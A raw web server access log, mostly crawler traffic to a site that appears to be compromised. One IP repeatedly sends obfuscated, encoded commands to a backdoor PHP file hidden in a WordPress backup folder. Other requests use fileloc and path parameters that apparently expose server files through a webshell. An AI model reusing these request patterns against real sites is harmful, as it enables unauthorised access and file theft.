51.79.248.20 - - [04/Nov/2025:04:05:39 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323631392p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232393031392q3661396661633338633666353632653433653733376164306638313639383463222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.114 - - [04/Nov/2025:04:05:39 +0000] "GET /q-~213h3uxM3kpgi19sZy5wdY7NQKGcmxUzO15558/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/.htaccess&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:05:43 +0000] "GET /q-~235o90CQ6KG7T8pfMjWQe4iBwYWLAVDxT41116/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/click.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:05:48 +0000] "GET /q-~213h3uxM3kpgi19sZy5wdY7NQKGcmxUzO15558/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/xmlrpc.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 4059 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.71.1 - - [04/Nov/2025:04:05:49 +0000] "GET /q-~116Dryzxe7Nk8fLtzm4a6IkH4UcQjXV7l19657/ HTTP/1.1" 200 24592 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.114 - - [04/Nov/2025:04:05:50 +0000] "GET /q-~221WluG5E5kMhhhyzY6T6e9cAmbsJM3pj49106/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/click.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:05:54 +0000] "GET /q-~235o90CQ6KG7T8pfMjWQe4iBwYWLAVDxT41116/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/xmlrpc.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 4059 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:05:57 +0000] "GET /q-~247suhjwGvXWz1k4ZPhLA6l4mMeXY21En5550/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/license.txt&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 9991 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [04/Nov/2025:04:06:01 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323634312p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232393034312q3261626661303635396436323164303534656637333330623836616463623462222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.114 - - [04/Nov/2025:04:06:01 +0000] "GET /q-~182WluG5E5kMhhhyzY6T6e9cAmbsJM3pj49145/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/pages.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3478 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:06:05 +0000] "GET /q-~221WluG5E5kMhhhyzY6T6e9cAmbsJM3pj49106/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/options.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3621 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:06:08 +0000] "GET /q-~182WluG5E5kMhhhyzY6T6e9cAmbsJM3pj49145/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/options.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3621 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.66.165 - - [04/Nov/2025:04:06:10 +0000] "GET /q-~12Oxxr3nKeX2OucQHEAu8zLYw1VNILeT243/ HTTP/1.1" 200 24536 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.114 - - [04/Nov/2025:04:06:12 +0000] "GET /q-~221WluG5E5kMhhhyzY6T6e9cAmbsJM3pj49106/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/pages.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3478 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:06:16 +0000] "GET /q-~182WluG5E5kMhhhyzY6T6e9cAmbsJM3pj49145/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/click.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:06:19 +0000] "GET /q-~235o90CQ6KG7T8pfMjWQe4iBwYWLAVDxT41116/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/pages.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3478 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [04/Nov/2025:04:06:23 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323636332p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232393036332q3631633431323434346662333766356364633331323438656639396538336562222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.114 - - [04/Nov/2025:04:06:23 +0000] "GET /q-~213h3uxM3kpgi19sZy5wdY7NQKGcmxUzO15558/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/click.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:06:26 +0000] "GET /q-~213h3uxM3kpgi19sZy5wdY7NQKGcmxUzO15558/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/options.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3621 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:06:31 +0000] "GET /q-~247suhjwGvXWz1k4ZPhLA6l4mMeXY21En5550/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 11897 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.66.163 - - [04/Nov/2025:04:06:31 +0000] "GET /?products=1701568878 HTTP/1.1" 200 26550 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.114 - - [04/Nov/2025:04:06:33 +0000] "GET /q-~221WluG5E5kMhhhyzY6T6e9cAmbsJM3pj49106/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 11898 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:06:37 +0000] "GET /q-~182WluG5E5kMhhhyzY6T6e9cAmbsJM3pj49145/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 17143 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:06:41 +0000] "GET /q-~213h3uxM3kpgi19sZy5wdY7NQKGcmxUzO15558/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 11898 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:06:43 +0000] "GET /q-~235o90CQ6KG7T8pfMjWQe4iBwYWLAVDxT41116/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 11898 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [04/Nov/2025:04:06:45 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323638352p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232393038352q6130393566363538616238323462653166316336326164306234626264656432222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.114 - - [04/Nov/2025:04:06:47 +0000] "GET /?sitemapindex.xml HTTP/1.1" 200 599 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:06:50 +0000] "GET /212zpf36212.html HTTP/1.1" 200 4360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.66.163 - - [04/Nov/2025:04:06:53 +0000] "GET /q-~219RQgk7Q2dmwJ1Yflo9aOm4mMnTQPXHm41474/ HTTP/1.1" 200 24539 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.114 - - [04/Nov/2025:04:06:54 +0000] "GET /163uoy30303.html HTTP/1.1" 200 4360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:06:57 +0000] "GET /204ocx33204.html HTTP/1.1" 200 4360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.130.57 - - [04/Nov/2025:04:06:58 +0000] "GET /q-~98Rza24wF7QQBxKJvyxHORVBodvOWo2z39135 HTTP/1.1" 200 4365 "https://lamphimquangcao.net/sitemap394.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
51.79.248.20 - - [04/Nov/2025:04:07:07 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323730372p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232393130372q6234636438363263346365656661656437613434646264313934383135323832222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.114 - - [04/Nov/2025:04:07:07 +0000] "GET /q-~247suhjwGvXWz1k4ZPhLA6l4mMeXY21En5550/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/options.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3621 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:07:12 +0000] "GET /q-~174hcvxfec5I7gjsxRVxCoRDWWGMaEcyX10607/ HTTP/1.1" 200 4360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:07:14 +0000] "GET /q-~25od3G40rBJAKDUTjavnXDojJYbmzpzj43874/ HTTP/1.1" 200 4360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:07:18 +0000] "GET /q-~82LwgcBlX0IeUKUvipJV84dPVasZURMl39183/ HTTP/1.1" 200 4360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:07:20 +0000] "GET /q-~235o90CQ6KG7T8pfMjWQe4iBwYWLAVDxT41116/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/options.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3621 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:07:25 +0000] "GET /212zpf36212.html?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/robots.txt&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 2725 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [04/Nov/2025:04:07:29 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323732392p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232393132392q3733333762643536386163663061316333623134343531323430383632306561222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.114 - - [04/Nov/2025:04:07:29 +0000] "GET /163uoy30303.html?path=/var/www/lamphim/data/www/lamphimquangcao.net/66650 HTTP/1.1" 200 2984 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:07:32 +0000] "GET /q-~174hcvxfec5I7gjsxRVxCoRDWWGMaEcyX10607/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-activate.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 5131 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.66.164 - - [04/Nov/2025:04:07:35 +0000] "GET /?products=261696896 HTTP/1.1" 200 24275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.114 - - [04/Nov/2025:04:07:36 +0000] "GET /204ocx33204.html?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-activate.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 5131 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:07:39 +0000] "GET /q-~174hcvxfec5I7gjsxRVxCoRDWWGMaEcyX10607/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/pages.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3478 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:07:42 +0000] "GET /q-~25od3G40rBJAKDUTjavnXDojJYbmzpzj43874/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-login.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 15612 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:07:46 +0000] "GET /q-~25od3G40rBJAKDUTjavnXDojJYbmzpzj43874/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.1" 200 3002 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:07:50 +0000] "GET /q-~174hcvxfec5I7gjsxRVxCoRDWWGMaEcyX10607/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.1" 200 3002 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [04/Nov/2025:04:07:52 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323735322p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232393135322q6165343834613364376364663334653464643766313863616362326666393538222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.114 - - [04/Nov/2025:04:07:54 +0000] "GET /q-~174hcvxfec5I7gjsxRVxCoRDWWGMaEcyX10607/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 4360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.71.1 - - [04/Nov/2025:04:07:56 +0000] "GET /?products=381681552 HTTP/1.1" 200 24354 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.114 - - [04/Nov/2025:04:07:57 +0000] "GET /q-~25od3G40rBJAKDUTjavnXDojJYbmzpzj43874/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 4360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:08:01 +0000] "GET /q-~82LwgcBlX0IeUKUvipJV84dPVasZURMl39183/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 4360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:08:05 +0000] "GET /q-~174hcvxfec5I7gjsxRVxCoRDWWGMaEcyX10607/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/readme.html&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 5692 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:08:08 +0000] "GET /q-~25od3G40rBJAKDUTjavnXDojJYbmzpzj43874/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/readme.html&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 5692 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:08:12 +0000] "GET /q-~112Ph7YyYRKtpfww7aPRLLzVJcCrMnzHw48933/ HTTP/1.1" 200 4360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [04/Nov/2025:04:08:14 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323737342p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232393137342q3666373165643965376338646335343436303433373166363934656539376238222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.114 - - [04/Nov/2025:04:08:16 +0000] "GET /204ocx33204.html?path=/ HTTP/1.1" 200 3566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.154.211 - - [04/Nov/2025:04:08:16 +0000] "GET /q-~98Ru9UpkrMNYq3jZq7xu6rko3Qvtl3sb6411 HTTP/1.1" 200 4360 "https://lamphimquangcao.net/sitemap667.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.66.165 - - [04/Nov/2025:04:08:17 +0000] "GET /?products=1988200170 HTTP/1.1" 200 25807 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.114 - - [04/Nov/2025:04:08:18 +0000] "GET /q-~14pWjVYhAheOqTyp8Tw2rtRmhC3bLDSY17407/ HTTP/1.1" 200 4360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:08:22 +0000] "GET /q-~206LrGrn9msBvJeDOfTAnIWkKMEkV9Mma25971/ HTTP/1.1" 200 4360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:08:25 +0000] "GET /q-~161BYpdrzlLvK2cxMOiwb8BCMkZejxtqz24094/ HTTP/1.1" 200 4360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:08:29 +0000] "GET /q-~188mzq3NOOVifjsED1YyIevlngFjWYJZC21801/ HTTP/1.1" 200 4360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:08:32 +0000] "GET /q-~112Ph7YyYRKtpfww7aPRLLzVJcCrMnzHw48933/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.1" 200 3002 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [04/Nov/2025:04:08:36 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323739362p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232393139362q6662396663386339666331366336393063333261636665653534626566306232222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.114 - - [04/Nov/2025:04:08:36 +0000] "GET /q-~112Ph7YyYRKtpfww7aPRLLzVJcCrMnzHw48933/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 4360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.66.164 - - [04/Nov/2025:04:08:38 +0000] "GET /?products=381795846 HTTP/1.1" 200 24757 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.114 - - [04/Nov/2025:04:08:40 +0000] "GET /q-~82LwgcBlX0IeUKUvipJV84dPVasZURMl39183/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.1" 200 3002 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:08:45 +0000] "GET /q-~206LrGrn9msBvJeDOfTAnIWkKMEkV9Mma25971/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.1" 200 3002 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
